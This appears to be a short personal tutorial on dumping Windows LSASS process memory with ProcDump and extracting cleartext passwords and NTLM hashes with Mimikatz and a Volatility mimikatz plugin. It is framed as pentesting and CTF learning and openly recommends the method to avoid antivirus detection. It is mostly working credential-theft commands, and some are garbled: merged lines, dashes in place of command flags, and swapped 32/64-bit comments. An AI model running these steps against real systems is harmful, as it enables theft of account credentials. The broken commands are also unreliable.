using Mimikatz to get cleartext password from offline memory dump
requirements :
new version of kali
mimikatz : wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
in case you found offline dump or you were able to dump lsas process using procdump
The technique can be involves in pentesting by obtaining passwords in clear text from a server without running “malicious” code in it since mimikatz is flagged by most AV . In this way we avoid having to deal with antivirus evasion techniques and other headaches.
On the other hand, Procdump is a tool developed by Mark Russinovich that will allow us to dump the memory space of a process to a file.
Note : To take dump you require system privileges
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
#For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp
#For 64 bitsDownload the file lsass.dmp generated.
Launch mimikatz alpha against the lsass.dmp file with the commands:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMPmimikatz # sekurlsa::logonPasswords full
in case of full memory dump you can follow the reference : which i did not try myself but should work in virtualbox : http://wiki.yobi.be/wiki/RAM_analysis#RAM_dump_with_VirtualBox:_via_pgmphystofile
— — — — — — -
now lets dig into volatility and mimikatz
by default volatility does not have mimikatz so you need to navigate to the directory
- /usr/share/volatility
- mkdir plugins
- cd plugins
- wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
- apt-get install python-crypto
- volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f halomar.dmp mimikatz
this is the memory dump file
if you need the ntlm hash :
volatility — plugins=/usr/share/volatility/plugins — profile=Win7SP0x86 -f ~/Desktop/ctf/halomar.dmp hashdump
That’s it , i did learn something new .. hope you do
